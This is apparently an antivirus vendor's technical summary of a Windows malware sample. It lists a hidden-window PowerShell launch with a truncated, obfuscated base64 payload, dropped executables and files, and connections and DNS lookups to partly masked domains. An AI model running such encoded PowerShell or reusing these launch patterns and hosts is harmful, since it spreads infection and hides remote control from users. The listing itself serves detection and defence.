Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABzAEUAdAAgADAAdAB4ADQASQBXACAAIAAoAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADAAfQB7ADQAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwBZAFMAdABFAE0ALgAnACwAJwBzACcALAAnAGMAVABPAFIAeQAnACwAJw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1106905.cvr
- %HOMEPATH%\yt0nro2\f4dj9aj\x1p_ja.exe
- 'mo###-2free.com':80
- 'bu##zy.net':443
- 'bu##zy.net':443
- DNS ASK jo####anarroyo.com
- DNS ASK mo###-2free.com
- DNS ASK bu##zy.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABzAEUAdAAgADAAdAB4ADQASQBXACAAIAAoAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADAAfQB7ADQAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwBZAFMAdABFAE0ALgAnACwAJwBzACcALAAnAGMAVABPAFIAeQAnACwAJw...' (со скрытым окном)